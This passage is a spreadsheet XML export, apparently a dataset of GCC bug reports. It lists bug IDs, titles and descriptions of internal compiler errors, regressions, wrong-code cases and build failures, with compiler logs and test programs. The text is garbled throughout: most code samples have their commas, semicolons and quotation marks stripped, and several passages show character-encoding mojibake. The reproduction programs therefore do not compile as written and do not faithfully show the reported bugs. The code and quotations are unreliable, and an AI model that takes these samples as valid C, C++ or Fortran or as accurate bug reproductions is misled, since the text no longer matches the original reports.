 /usr/lib/gcc/x86_64-unknown-linux-gnu/4.7.0/cc1plus -quiet -v -D_GNU_SOURCE test.cpp -quiet -dumpbase test.cpp -mtune=generic -march=x86-64 -auxbase test -Wall -Wextra -std=c++0x -version -o /tmp/cc0WblC2.s
GNU C++ (GCC) version 4.7.0 20110723 (experimental) (x86_64-unknown-linux-gnu)
        compiled by GNU C version 4.7.0 20110723 (experimental) GMP version 5.0.2 MPFR version 3.0.1-p4 MPC version 0.9
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
ignoring nonexistent directory /usr/local/include
ignoring nonexistent directory /usr/lib/gcc/x86_64-unknown-linux-gnu/4.7.0/../../../../x86_64-unknown-linux-gnu/include
#include ... search starts here:
#include  search starts here:
 /usr/lib/gcc/x86_64-unknown-linux-gnu/4.7.0/include/c++
 /usr/lib/gcc/x86_64-unknown-linux-gnu/4.7.0/include/c++/x86_64-unknown-linux-gnu
 /usr/lib/gcc/x86_64-unknown-linux-gnu/4.7.0/include/c++/backward
 /usr/lib/gcc/x86_64-unknown-linux-gnu/4.7.0/include
 /usr/lib/gcc/x86_64-unknown-linux-gnu/4.7.0/include-fixed
 /usr/include
End of search list.
GNU C++ (GCC) version 4.7.0 20110723 (experimental) (x86_64-unknown-linux-gnu)
        compiled by GNU C version 4.7.0 20110723 (experimental) GMP version 5.0.2 MPFR version 3.0.1-p4 MPC version 0.9
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
Compiler executable checksum: 914976d5d676edf344087969a3789281
test.cpp: In function 'Ret f(const C&amp;)':
test.cpp:32:22: error: expected primary-expression before 'int'
test.cpp:32:22: error: expected '' before 'int'</t>
  </si>
  <si>
    <t>lex4051</t>
  </si>
  <si>
    <t>GCC-1401</t>
  </si>
  <si>
    <t>+= semantics not correct (when generating bytecode)</t>
  </si>
  <si>
    <t xml:space="preserve">From: Alexandre Petit-Bianco 
To: java-gnats@sourceware.cygnus.com
Cc:  
Subject: Re: gcj/371: += semantics not correct
Date: Sun 19 Nov 2000 22:22:40 -0800 (PST)
 tromey@redhat.com writes:
 &gt; Consider the program below.  It prints `2'.  However it should
 &gt; print `1'.  The problem is that we evaluate the left-hand side of
 &gt; the `+=' twice contradicting JLS 15.26.2.  Maybe using a SAVE_EXPR
 &gt; in build_assignment() would be good enough?
 Most likely. Note that this could be a regression -- we spent quite
 some time in the past getting these cases right but it might have
 broken again at some point :-(
 ./A
</t>
  </si>
  <si>
    <t>GCC-59373</t>
  </si>
  <si>
    <t>Table 92 is unreadable</t>
  </si>
  <si>
    <t>Is:
Table 92 adapted here gives the relation between openmode combinations and the equivalent fopen() flags. (NB: lines app in|out|app in|app binary|app binary|in|out|app and binary|in|app per DR 596) +â€”â€”â€”â€”â€”â€”â€”â€”â€”â€”â€”â€”â€”â€”â€”â€”â€”â€”â€”+ | ios_base Flag combination stdio equivalent | |binary in out trunc app | +â€”â€”â€”â€”â€”â€”â€”â€”â€”â€”â€”â€”â€”â€”â€”â€”â€”â€”â€”+ | + w | | + + a | | + a | | + + w | | + r | | + + r+ | | + + + w+ | | + + + a+ | | + + a+ | +â€”â€”â€”â€”â€”â€”â€”â€”â€”â€”â€”â€”â€”â€”â€”â€”â€”â€”â€”+ | + + wb | | + + + ab | | + + ab | | + + + wb | | + + rb | | + + + r+b | | + + + + w+b | | + + + + a+b | | + + + a+b | +â€”â€”â€”â€”â€”â€”â€”â€”â€”â€”â€”â€”â€”â€”â€”â€”â€”â€”â€”+
I beg your pardon?  It is not only unreadable it is undecipherable because white space is collapsed.
(Workaround: )</t>
  </si>
  <si>
    <t>GCC-34140</t>
  </si>
  <si>
    <t>[4.3 Regression] ICE in is_hidden_global_store at tree-ssa-sink.c:207</t>
  </si>
  <si>
    <t>With current trunk.  This was introduced between 20070916 and 20071020.
(sid)1687:tbm@em64t: ~] /usr/lib/gcc-snapshot/bin/gcc -c -O3 -Wall gnubg-rollout.c
gnubg-rollout.c: In function 'RolloutGeneral':
gnubg-rollout.c:15: internal compiler error: in is_hidden_global_store at tree-ssa-sink.c:207
Please submit a full bug report
with preprocessed source if appropriate.</t>
  </si>
  <si>
    <t>GCC-16707</t>
  </si>
  <si>
    <t>[3.4/4.0 regression] ICE with using</t>
  </si>
  <si>
    <t>Since gcc 3.4.0 the compiler crashes on the following invalid code snippet:
==========================
int i
using N::i
==========================
The error message from mainline is:
bug.cc:2: error: `N' has not been declared
bug.cc:2: error: expected nested-name-specifier before i
bug.cc:2: internal compiler error: in push_using_decl at cp/name-lookup.c:1914
Please submit a full bug report [etc.]</t>
  </si>
  <si>
    <t>GCC-81923</t>
  </si>
  <si>
    <t>[ASAN] gcc emites wrong odr asan instrumentation for glibc</t>
  </si>
  <si>
    <t>Hello
I'm currently working on enabling the build of glibc with ASan instrumentation and facing this type of error:
/tmp/ccKWa1tS.s: Assembler messages:
/tmp/ccKWa1tS.s:20: Error: junk at end of line first unrecognized character is `*'
/tmp/ccKWa1tS.s:21: Error: junk at end of line first unrecognized character is `*'
/tmp/ccKWa1tS.s:23: Error: unrecognized symbol type 
/tmp/ccKWa1tS.s:23: Error: junk at end of line first unrecognized character is `*'
/tmp/ccKWa1tS.s:24: Error: expected comma after name `__odr_asan.' in .size directive
/tmp/ccKWa1tS.s:25: Error: invalid character '*' in mnemonic
/tmp/ccKWa1tS.s:53: Error: invalid operands (*UND* and .rodata sections) for `*'
As far as I understood the KASAN disables this type of instrumentation:
2567 static bool
2568 asan_needs_odr_indicator_p (tree decl)
2569 {
2570   /* Don't emit ODR indicators for kernel because:
2571      a) Kernel is written in C thus doesn't need ODR indicators.
2572      b) Some kernel code may have assumptions about symbols containing specific
2573         patterns in their names.  Since ODR indicators contain original names
2574         of symbols they are emitted for these assumptions would be broken for
2575         ODR indicator symbols.  */
2576   return (!(flag_sanitize &amp; SANITIZE_KERNEL_ADDRESS)
2577           &amp;&amp; !DECL_ARTIFICIAL (decl)
2578           &amp;&amp; !DECL_WEAK (decl)
2579           
2580 }
Could it be some solution for glibc ? Or may be compile time flag.
Thanks.</t>
  </si>
  <si>
    <t>GCC-66454</t>
  </si>
  <si>
    <t>Common -Wmisleading-indentation false-positive triggered in the Linux kernel</t>
  </si>
  <si>
    <t>The following test case is a template exhibiting the kind of code in the Linux kernel that often triggers a -Wmisleading-indentation false-positive:
  int *p
  void
  foo (int n)
  {
      if (p) {
        foo (1)
      } else
      if (p)
        foo (2)
      foo (3)
  }
indentation.c: In function â€˜fooâ€™:
indentation.c:13:5: warning: statement is indented as if it were guarded by... [-Wmisleading-indentation]
     foo (3)
     ^
indentation.c:10:7: note: ...this â€˜elseâ€™ clause but it is not
     } else
       ^</t>
  </si>
  <si>
    <t>GCC-60314</t>
  </si>
  <si>
    <t>[C++1y] ICE with decltype(auto) when generating debug information</t>
  </si>
  <si>
    <t>Using trunk (g++-trunk (GCC) 4.9.0 20140222 (experimental)):
$Â cat main.cpp 
// fine
// decltype(auto) qux() { return 42 }
struct foo {
    // also ICEs if not static
    static decltype(auto) bar()
    { return 42 }
}
int main()
{
}
$Â g++-trunk -std=c++1y main.cpp # Succeeds
$Â g++-trunk -std=c++1y main.cpp -g
main.cpp:4:8: internal compiler error: in gen_type_die_with_usage at dwarf2out.c:19864
 struct foo {
        ^
0x8dcdf9 gen_type_die_with_usage
	../../gcc/gcc/dwarf2out.c:19864
0x8d9945 gen_decl_die
	../../gcc/gcc/dwarf2out.c:20361
0x8db9f4 gen_member_die
	../../gcc/gcc/dwarf2out.c:19414
0x8db9f4 gen_struct_or_union_type_die
	../../gcc/gcc/dwarf2out.c:19486
0x8db9f4 gen_tagged_type_die
	../../gcc/gcc/dwarf2out.c:19676
0x8dcd6d gen_type_die_with_usage
	../../gcc/gcc/dwarf2out.c:19823
0x8d9ba2 gen_decl_die
	../../gcc/gcc/dwarf2out.c:20400
0xae80b2 rest_of_type_compilation(tree_node* int)
	../../gcc/gcc/passes.c:283
0x653f70 finish_struct_1(tree_node*)
	../../gcc/gcc/cp/class.c:6636
0x65548c finish_struct(tree_node* tree_node*)
	../../gcc/gcc/cp/class.c:6801
0x6880a1 cp_parser_class_specifier_1
	../../gcc/gcc/cp/parser.c:19249
0x6880a1 cp_parser_class_specifier
	../../gcc/gcc/cp/parser.c:19468
0x6880a1 cp_parser_type_specifier
	../../gcc/gcc/cp/parser.c:14305
0x6a112d cp_parser_decl_specifier_seq
	../../gcc/gcc/cp/parser.c:11547
0x6a7ab9 cp_parser_simple_declaration
	../../gcc/gcc/cp/parser.c:11137
0x68b570 cp_parser_block_declaration
	../../gcc/gcc/cp/parser.c:11086
0x6b4abb cp_parser_declaration
	../../gcc/gcc/cp/parser.c:10983
0x6b373d cp_parser_declaration_seq_opt
	../../gcc/gcc/cp/parser.c:10869
0x6b4f9a cp_parser_translation_unit
	../../gcc/gcc/cp/parser.c:4014
0x6b4f9a c_parse_file()
	../../gcc/gcc/cp/parser.c:31568
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-6387</t>
  </si>
  <si>
    <t>[3.2 regression] -fpic -gdwarf-2 -g1 combination give ICE in dwarf2out</t>
  </si>
  <si>
    <t xml:space="preserve"> While compiling libstdc++
Release:
3.0.99.9 20020415 (prerelease)
Environment:
System: Linux mwg 2.4.19-pre5-ac1 #1 Thu Apr 4 10:43:33 PST 2002 i686 unknown
Architecture: i686
host: i686-inX-linux
build: i686-inX-linux
target: i686-inX-linux
configured with: ../configure --prefix=/usr --exec-prefix=/usr --datadir=/usr/lib --includedir=/usr/local/include --with-gnu-ld --with-gnu-as --with-local-prefix=/usr/local --with-gxx-include-dir=/usr/include/c++3.1 --with-cpp-install-dir=/lib --disable-c-mbchar --enable-threads=posix --with-dwarf2 --enable-shared --disable-nls --with-system-zlib --enable-version-specific-runtime-libs --with-slibdir=/lib --enable-fast-character --enable-interpreter --with-x --enable-clocale=gnu --disable-c-mbchar --enable-c99 --enable-long-long --enable-cheaders=c_std --enable-cxx-flags=-march=i686 -pipe -O2 -fomit-frame-pointer -momit-leaf-frame-pointer -frename-registers -fexpensive-optimizations -fschedule-insns2 -malign-stringops -fno-keep-static-consts -fno-keep-inline-functions -fdata-sections -ffunction-sections --enable-languages=cc++gcovproto --verbose --host=i686-inX-linux --build=i686-inX-linux --target=i686-inX-linux
How-To-Repeat:
/usr/share/src/devel/gcc/linux/gcc/xgcc -shared-libgcc -B/usr/share/src/devel/gcc/linux/gcc/ -nostdinc++ -L/usr/share/src/devel/gcc/linux/i686-inX-linux/libstdc++-v3/src -L/usr/share/src/devel/gcc/linux/i686-inX-linux/libstdc++-v3/src/.libs -B/usr/lib/gcc/i686-inX-linux/bin/ -B/usr/lib/gcc/i686-inX-linux/lib/ -isystem /usr/lib/gcc/i686-inX-linux/include -I../../../../libstdc++-v3/../gcc -I../../../../libstdc++-v3/../include -I/usr/share/src/devel/gcc/linux/i686-inX-linux/libstdc++-v3/include/i686-inX-linux -I/usr/share/src/devel/gcc/linux/i686-inX-linux/libstdc++-v3/include -I../../../../libstdc++-v3/libsupc++ -g -O2 -D_GNU_SOURCE -fno-implicit-templates -Wall -Wno-format -W -Wwrite-strings -Winline -fdiagnostics-show-location=once -march=i686 -pipe -O2 -fomit-frame-pointer -momit-leaf-frame-pointer -frename-registers -fexpensive-optimizations -fschedule-insns -fschedule-insns2 -malign-stringops -fno-keep-static-consts -fno-keep-inline-functions -fdata-sections -ffunction-sections -ffunction-sections -fdata-sections -g -c ../../../../libstdc++-v3/libsupc++/eh_personality.cc  -fPIC -DPIC -g1 -o eh_personality.o</t>
  </si>
  <si>
    <t>tmwg-gcc</t>
  </si>
  <si>
    <t>GCC-4151</t>
  </si>
  <si>
    <t>gcc will not permit printf() to be redefined with -O switch</t>
  </si>
  <si>
    <t xml:space="preserve">	When my code snippet is compiled without the -O switch gcc compiles
	the file corectly and the program runs correctly.
	When compiled with the -O switch gcc complains about conflicting types
	for built-in function `fprintf'.
Release:
3.0.1
Environment:
System: Linux budgie.cs.uwa.edu.au 2.4.3 #10 Wed Aug 1 16:16:51 WST 2001 i686 unknown
Architecture: i686
host: i686-pld-linux-gnu
build: i686-pld-linux-gnu
target: i686-pld-linux-gnu
configured with: ../configure --prefix=/usr --infodir=/usr/share/info --mandir=/usr/share/man --enable-shared --enable-threads=posix --enable-haifa --enable-languages=cc++f77gcovjavaobjc --enable-long-long --enable-namespaces --enable-multilib --with-gnu-as --with-gnu-ld --with-system-zlib --with-slibdir=/lib --without-x i686-pld-linux
How-To-Repeat:
	Preprocessor output is appended here.
	Compiles with:		gcc -o try try.c
	But not with:		gcc -O -o try try.c
	When the -O switch is used gcc converts printf(...) to
	fprintf(stdout ...) which may not always be appropriate.</t>
  </si>
  <si>
    <t>GCC-1665</t>
  </si>
  <si>
    <t>derived inner class template</t>
  </si>
  <si>
    <t>'internal compiler error' when declaring a class in a class template when that inner class is itself deriving from another class
Release:
2.95.3 from gcc-c++-2.95.2-12mdk.i586.rpm
Environment:
Mandrake Linux 7.2 (kernel 2.2.17 glibc 2.1.3)
How-To-Repeat:
g++ template.cpp -o template breaks on line 80</t>
  </si>
  <si>
    <t>sylvain.gommier</t>
  </si>
  <si>
    <t>GCC-18263</t>
  </si>
  <si>
    <t>[3.4 only] Build broken for ARC.</t>
  </si>
  <si>
    <t>The build for ARC got broken inadvertently due to a typo in a patch submitted
earlier by me for lib1funcs.asm . 
This is because cmp is not a valid instruction in the ARCTangent A4.
./xgcc -B./ -B/usr/local/arcfsf/arc-elf32/bin/ -isystem
/usr/local/arcfsf/arc-elf32/include -isystem
/usr/local/arcfsf/arc-elf32/sys-include
-L/mnt/tools/fsf/fsfbuild/build-gcc-arc-elf32/gcc/../ld -O2  -DIN_GCC
-DCROSS_COMPILE   -W -Wall -Wwrite-strings -Wstrict-prototypes
-Wmissing-prototypes -Wold-style-definition  -isystem ./include   -g 
-DIN_LIBGCC2 -D__GCC_FLOAT_NOT_NEEDED -Dinhibit_libc -I. -I.
-I/mnt/tools/fsf/fsfgcc/gcc-4.0-fresh/gcc/gcc
-I/mnt/tools/fsf/fsfgcc/gcc-4.0-fresh/gcc/gcc/.
-I/mnt/tools/fsf/fsfgcc/gcc-4.0-fresh/gcc/gcc/../include
-I/mnt/tools/fsf/fsfgcc/gcc-4.0-fresh/gcc/gcc/../libcpp/include  -DL_umulsidi3
-xassembler-with-cpp -c
/mnt/tools/fsf/fsfgcc/gcc-4.0-fresh/gcc/gcc/config/arc/lib1funcs.asm -o
libgcc/./_umulsidi3.o
/mnt/tools/fsf/fsfgcc/gcc-4.0-fresh/gcc/gcc/config/arc/lib1funcs.asm: Assembler
messages:
/mnt/tools/fsf/fsfgcc/gcc-4.0-fresh/gcc/gcc/config/arc/lib1funcs.asm:70:
Warning: .option directive overrides command-line (default) value
/mnt/tools/fsf/fsfgcc/gcc-4.0-fresh/gcc/gcc/config/arc/lib1funcs.asm:92: Error:
bad instruction `cmp r00'
make[1]: *** [libgcc/./_umulsidi3.o] Error 1
make[1]: Leaving directory `/mnt/tools/fsf/fsfbuild/build-gcc-arc-elf32/gcc'
make: *** [libgcc.a] Error 2
I will be submitting a patch to fix this PR shortly.</t>
  </si>
  <si>
    <t>GCC-70752</t>
  </si>
  <si>
    <t>Incorrect LEN for ALLOCATABLE CHARACTER</t>
  </si>
  <si>
    <t>$ gfortran --version
GNU Fortran (GCC) 5.3.1 20160406 (Red Hat 5.3.1-6)
$ cat test.f95
PROGRAM TEST
IMPLICIT NONE
INTEGER PARAMETER :: I = 3
TYPE T
   CHARACTER(LEN=:) ALLOCATABLE :: C(:)
END TYPE T
TYPE(T) TARGET :: S
CHARACTER (LEN=I) POINTER :: P(:)
ALLOCATE ( CHARACTER(LEN=I) :: S%C(5) )
PRINT * 'SIZE(S%C) = 'SIZE(S%C)
PRINT * 'LEN(S%C) = 'LEN(S%C)
P =&gt; S%C
END PROGRAM TEST
$ gfortran -Wall -fbounds-check test.f95 -o test
$ ./test
 SIZE(S%C) =            5
 LEN(S%C) =            0
At line 14 of file test.f95
Fortran runtime error: Unequal character lengths (3/0) in pointer assignment
? Why does the LEN function return zero?
The SIZE function is correct.
LEN(S%C(1)) gives the correct result but LEN should work with an array argument too.
? Why does the pointer assignment fail?
It is OK without -fbounds-check.</t>
  </si>
  <si>
    <t>GCC-17506</t>
  </si>
  <si>
    <t>[4.0/4.1 Regression]  warning about uninitialized variable points to wrong location</t>
  </si>
  <si>
    <t>In patching cp/class.c I get the following error out of a bootstrap
../../gcc/gcc/cp/class.c: In function `finish_struct_1':
../../gcc/gcc/tree.h:80: warning: 'ix' is used uninitialized in this function
*) tree.h:80 is a static inline function which is called from finish_struct_1
*) finish_struct_1 nor that inline function have a variable called 'ix' (that I
can see).
I've attached a preprocessed source with all the #lines removed and the
expansion of tree.h:80 split onto several lines for easy location. It has the
same problems reporting
nathan@garibaldi:390&gt;./cc1 -quiet -fdump-tree-all -Wall -W  -g -O2 unused.i
unused.i: In function `finish_struct_1':
unused.i:4262: warning: 'ix' is used uninitialized in this function
line 4262 is '  if (vec_ &amp;&amp; ix_ num)' -- a distinct lack of 'ix'.</t>
  </si>
  <si>
    <t>GCC-1801</t>
  </si>
  <si>
    <t>gcc on AIX 4.3.3 doesn`t support long double type</t>
  </si>
  <si>
    <t xml:space="preserve">  printf ( sizeof(long double)=%dsizeof(long double))
  and 
 printf ( sizeof( double)=%dsizeof( double))
  gives same size = 8
Release:
gcc 2.95.2 19991024
Environment:
AIX 4.3.3 hardware model RS 6000 E-30
How-To-Repeat:
just compile these 2 lines</t>
  </si>
  <si>
    <t>levo</t>
  </si>
  <si>
    <t>GCC-5238</t>
  </si>
  <si>
    <t>Exceptions work in 3.0.2 not in 3.0.3</t>
  </si>
  <si>
    <t>Exception handling in 3.0.2 works in 3.0.3 it fails.
I could not make the example below fail when everything
was in one file so I kept it split up into three small
files.
Release:
gcc version 3.0.3
Environment:
Reading specs from /usr/lib/gcc-lib/i586-mandrake-linux-gnu/3.0.3/specs
Configured with: ../configure --prefix=/usr --mandir=/usr/share/man --infodir=/usr/share/info --datadir=/usr/share/gcc-3.0.3 --enable-shared --enable-threads=posix --disable-checking --enable-long-long --enable-cstdio=stdio --enable-clocale=generic --enable-languages=cc++f77objcjava --program-suffix=-3.0.3 --enable-objc-gc --host=i586-mandrake-linux-gnu
Thread model: posix
gcc version 3.0.3 (Mandrake Linux 8.2 3.0.3-1mdk)
How-To-Repeat:
CPP = gcc-3.0.3
CPPFLAGS = -g -fPIC -D_REENTRANT -DDEBUG -D_GNU_SOURCE
exTest: exTest.cpp LogTest.h LogTest.o TestException.h
    ${CPP} exTest.cpp -o exTest ${CPPFLAGS} LogTest.o
LogTest.o: LogTest.cpp LogTest.h TestException.h
    ${CPP} LogTest.cpp -c -o LogTest.o ${CPPFLAGS}
******** TestException.h **********
#ifndef _EXCEPTION_H
#define _EXCEPTION_H
#include 
class TestException {
protected:
    char msg[1024]
public:
    TestException(const char *errorMessage) {
        strcpy(msg errorMessage)
    }
}
#endif
******* LogTest.h **********
#ifndef _LOG_H
#define _LOG_H
#include TestException.h
class LogTest {
protected:
public:
    LogTest()
    ~LogTest() {}
    //void init(const char* logFile bool truncate bool doChown=true)
    //void init(const char* logFile bool truncate)
    //void init(const char* logFile)
    void init()
        throw(TestException)
}
#endif
********* LogTest.cpp ***********
#include LogTest.h
LogTest::LogTest() {
}
//void LogTest::init(const char* logName bool truncate int doChown)
//void LogTest::init(const char* logName bool truncate)
void LogTest::init()
    throw(TestException) {
    throw TestException(Log blah)
}
******** exTest.cpp *********
#include 
#include 
#include LogTest.h
int main(int argc char** argv) {
    LogTest log
    try {
        log.init() // aborts
        //log.init(msg) // aborts
        //log.init(msg true) // aborts
        //log.init(msg true true) // aborts
    } catch(TestException e) {
        printf(caught\n)
    }
    return 0
}
Use the make targets provided.
./exTest
will abort.</t>
  </si>
  <si>
    <t>GCC-55198</t>
  </si>
  <si>
    <t>[4.8 Regression] libquadmath/math/fmaq.c:233:7: internal compiler error</t>
  </si>
  <si>
    <t>libtool: compile:  /test/gnu/gcc/objdir/./gcc/xgcc -B/test/gnu/gcc/objdir/./gcc/
 -B/opt/gnu/gcc/gcc-4.8/hppa2.0w-hp-hpux11.11/bin/ -B/opt/gnu/gcc/gcc-4.8/hppa2.0w-hp-hpux11.11/lib/ -isystem /opt/gnu/gcc/gcc-4.8/hppa2.0w-hp-hpux11.11/include
 -isystem /opt/gnu/gcc/gcc-4.8/hppa2.0w-hp-hpux11.11/sys-include -DHAVE_CONFIG_H
 -I. -I../../../gcc/libquadmath -g -O2 -MT math/fmaq.lo -MD -MP -MF math/.deps/f
maq.Tpo -c ../../../gcc/libquadmath/math/fmaq.c  -fPIC -DPIC -o math/.libs/fmaq.o../../../gcc/libquadmath/math/fmaq.c: In function 'fmaq':../../../gcc/libquadmath/math/fmaq.c:233:7: internal compiler error: in expand_asm_operands at stmt.c:912
       asm volatile ( : : m (v.value))       ^../../../gcc/libquadmath/math/fmaq.c:233:7: internal compiler error: Aborted
Probably introduced by:
2012-10-31  Tobias Burnus  
            Joseph Myers 
            David S. Miller 
            Ulrich Drepper 
            Marek Polacek :
            Petr Baudis 
        * math/complex.c (csqrtq): NaN and INF fixes. 
        * math/sqrtq.c (sqrt): NaN INF and &lt; 0 fixes.
        * math/expm1q.c (expm1q): Changes from GLIBC. Use expq for
        large parameters. Fix errno for boundary conditions.
        * math/finiteq.c (finiteq): Add comment.
        * math/fmaq.c (fmaq): Changes from GLIBC. Fix missing underflows
        and bad results for some subnormal results. Fix sign of inexact
        zero return. Fix sign of exact zero return. 
        Ensure additions are not scheduled after fetestexcept.
-bash-3.2$ ./xgcc -B./ -v
Reading specs from ./specs
COLLECT_GCC=./xgcc
COLLECT_LTO_WRAPPER=./lto-wrapper
Target: hppa2.0w-hp-hpux11.11
Configured with: ../gcc/configure --with-gnu-as --with-as=/opt/gnu/bin/as --enable-shared --with-local-prefix=/opt/gnu --prefix=/opt/gnu/gcc/gcc-4.8 --with-gmp=/opt/gnu/gcc/gmp --enable-threads=posix --enable-debug=no --disable-nls --without-cloog --without-ppl --enable-languages=cc++objcjavaadaobj-c++
Thread model: posix
gcc version 4.8.0 20121103 (experimental) [trunk revision 193124] (GCC)</t>
  </si>
  <si>
    <t>GCC-25960</t>
  </si>
  <si>
    <t>__gcc_qadd doesn't handle -0.0L properly</t>
  </si>
  <si>
    <t>volatile long double l m n
extern void abort (void)
int
main (void)
{
  l = __builtin_copysignl (0.0L -1.0L)
  m = __builtin_copysignl (0.0L -1.0L)
  n = l + m
  if (__builtin_copysignl (1.0L n) &gt;= 0.0L)
    abort ()
  return 0
}
fails on ppc*-linux with -mlong-double-128 -0.0 + -0.0 gives 0.0 rather than
expected -0.0.</t>
  </si>
  <si>
    <t>GCC-3057</t>
  </si>
  <si>
    <t>Error Compiling C++ on Solaris 2.6</t>
  </si>
  <si>
    <t>When compiling using a map and iterator the following error occures:
/usr/ccs/bin/as: /home/asthomps/dev/go/src/goApplication/.snprj/cc6ulaoc.s line 2348: error: can't compute value of an expression involving an external symbol
This appears to be a know bug with a work arround as I've found old news group references but I can not seem to access the faq.
Release:
2.95.2
Environment:
Solaris 2.6 - Sun Box
How-To-Repeat:
Create a c++ program using a map.  Add some data to the map and access it using the find method returning an iterator.  Try to compile the program using -c (no linking).</t>
  </si>
  <si>
    <t>tony.thompson</t>
  </si>
  <si>
    <t>GCC-59695</t>
  </si>
  <si>
    <t>bad code generation on aarch64 in aarch64_output_mi_thunk</t>
  </si>
  <si>
    <t>seen in a segfault running the tests in the coinor-osi package
https://launchpad.net/bugs/1263576 both in saucy and trusty version 0.106.4
and 0.106.5. Version 0.103 doesn't show the issue.
both the 4.7 and 4.8 linaro branches show this behaviour and trunk 20131121
(didn't build a newer one yet).
William Grant tracked that down to a bug with very negative vcall_offsets in
aarch64 multiple inheritance thunks. The example below has two consecutive
thunks with the second adding 263 instead of subtracting 264.
aarch64_build_constant seems to not handle negative integers. He tried a quick
gcc patch to avoid using aarch64_build_constant and the coinor-osi tests succeed.
0000000000401ca4 :
  401ca4:       f9400010        ldr     x16 [x0]
  401ca8:       f8500211        ldr     x17 [x16#-256]
  401cac:       8b110000        add     x0 x0 x17
  401cb0:       17fffff9        b       401c94 
[...]
0000000000401cc4 :
  401cc4:       f9400010        ldr     x16 [x0]
  401cc8:       d28020f1        mov     x17 #0x107                     // #263
  401ccc:       f8716a11        ldr     x17 [x16x17]
  401cd0:       8b110000        add     x0 x0 x17
  401cd4:       17fffff8        b       401cb4 
Any chance for a quick 2013 review?
Thanks Matthias
--- a/gcc/config/aarch64/aarch64.c
+++ b/gcc/config/aarch64/aarch64.c
@@ -25408 +25408 @@
 	  addr = plus_constant (Pmode temp0 vcall_offset)
       else
 	{
-	  aarch64_build_constant (IP1_REGNUM vcall_offset)
-	  addr = gen_rtx_PLUS (Pmode temp0 temp1)
+	  aarch64_add_constant (IP0_REGNUM IP1_REGNUM vcall_offset)
+	  addr = temp0
 	}
       aarch64_emit_move (temp1 gen_rtx_MEM (Pmodeaddr))</t>
  </si>
  <si>
    <t>GCC-69589</t>
  </si>
  <si>
    <t>[6 Regression] ICE in initialize_node_lattices at ipa-cp.c:971</t>
  </si>
  <si>
    <t>Hello.
Following ICE comes from Firefox test-suite I was able to reduce the number of pre-processed source files to 3 to expose the internal compiler error.
$ c++ -flto -O2 -rdynamic Unified_cpp_js_src*.ii
lto1: internal compiler error: in initialize_node_lattices at ipa-cp.c:971
0x113c6c8 initialize_node_lattices
	../../gcc/ipa-cp.c:971
0x113c6c8 ipcp_propagate_stage
	../../gcc/ipa-cp.c:2927
0x113da3c ipcp_driver
	../../gcc/ipa-cp.c:4606
0x113da3c execute
	../../gcc/ipa-cp.c:4698
Source files: https://drive.google.com/file/d/0B0pisUJ80pO1SWtLUnNVQkZwZFU/view?usp=sharing
I tried to reduce it with creduce (now having capability to reduce multiple files) but it does not process any simplification.
Thanks
Martin</t>
  </si>
  <si>
    <t>GCC-21260</t>
  </si>
  <si>
    <t>Conflict between comment and H edit descriptor</t>
  </si>
  <si>
    <t>program b
      write(68000)
8000  format(72(1H!))
      end
kargl[213] gfc41 -o b b.f
 In file b.f:3
8000  format(72(1H!))                                                   
                                                                       1
Error: Unexpected end of format string in format string at (1)
 In file b.f:2
      write(68000)                                                     
                 1
Error: FORMAT label 8000 at (1) not defined</t>
  </si>
  <si>
    <t>GCC-38235</t>
  </si>
  <si>
    <t>gfortran.dg/pr37243.f has undefined variables / bounds error</t>
  </si>
  <si>
    <t>$ ifort -CB pr37243.f
$ ./a.out
forrtl: severe (408): fort: (3): Subscript #2 of the array V has value 0 which is less than the lower bound of 1
Image              PC        Routine            Line        Source
a.out              0808C357  Unknown               Unknown  Unknown
a.out              0808B977  Unknown               Unknown  Unknown
a.out              0805934E  Unknown               Unknown  Unknown
a.out              0804B106  Unknown               Unknown  Unknown
a.out              0804A79F  Unknown               Unknown  Unknown
a.out              0804A26E  Unknown               Unknown  Unknown
a.out              08049BAF  Unknown               Unknown  Unknown
a.out              08049B61  Unknown               Unknown  Unknown
libc.so.6          B7E52455  Unknown               Unknown  Unknown
a.out              08049A91  Unknown               Unknown  Unknown
$ gfortran -fbounds-check pr37243.f
$ ./a.out
At line 37 of file pr37243.f
Fortran runtime error: Array reference out of bounds for array 'v' lower bound of dimension 2 exceeded (-1081884012 &lt; 1)</t>
  </si>
  <si>
    <t>GCC-24036</t>
  </si>
  <si>
    <t>[4.1/4.2 Regression] [e500] ICE in subreg_offset_representable_p at rtlanal.c:3143</t>
  </si>
  <si>
    <t>ICE when using -mfloat-gprs=double with -mspe=no. Found in the e500 branch
reproducible in mainline.
Test case:
typedef double _Complex _Dcomplex
double (cabs)(_Dcomplex x) { }
[rmansfield@bender rmansfield]$
/home/rmansfield/crosstool/powerpc-linux-gnuspe/gcc-head-glibc-2.3.5/bin/powerpc-linux-gnuspe-gcc
-mfloat-gprs=double -mcpu=8548 ~/cabs.i -c -mspe=no -v
Using built-in specs.
Target: powerpc-linux-gnuspe
Configured with:
/home/rmansfield/crosstool-0.28-rc37/build/powerpc-linux-gnuspe/gcc-head-glibc-2.3.5/gcc-head/configure
--target=powerpc-linux-gnuspe --host=i686-host_pc-linux-gnu
--prefix=/home/rmansfield/crosstool/powerpc-linux-gnuspe/gcc-head-glibc-2.3.5
--with-local-prefix=/home/rmansfield/crosstool/powerpc-linux-gnuspe/gcc-head-glibc-2.3.5/powerpc-linux-gnuspe
--disable-multilib --with-newlib --without-headers --disable-nls
--enable-threads=no --enable-symvers=gnu --enable-__cxa_atexit
--enable-languages=c --disable-shared
Thread model: single
gcc version 4.1.0 20050917 (experimental)
 /home/rmansfield/crosstool/powerpc-linux-gnuspe/gcc-head-glibc-2.3.5/libexec/gcc/powerpc-linux-gnuspe/4.1.0/cc1
-fpreprocessed /home/rmansfield/cabs.i -quiet -dumpbase cabs.i
-mfloat-gprs=double -mcpu=8548 -mspe=no -auxbase cabs -version -o /tmp/ccNYZQDL.s
GNU C version 4.1.0 20050917 (experimental) (powerpc-linux-gnuspe)
        compiled by GNU C version 3.3.3 20040412 (Red Hat Linux 3.3.3-7).
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
Compiler executable checksum: 947d94ba0d127e0ee2614bdf9bacf926
/home/rmansfield/cabs.i: In function 'cabs':
/home/rmansfield/cabs.i:3: internal compiler error: in
subreg_offset_representable_p at rtlanal.c:3143
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
&gt; If this is reproducible in mainline could you submit this bug in bugzilla and 
&gt; assign it to me?
&gt; Thanks
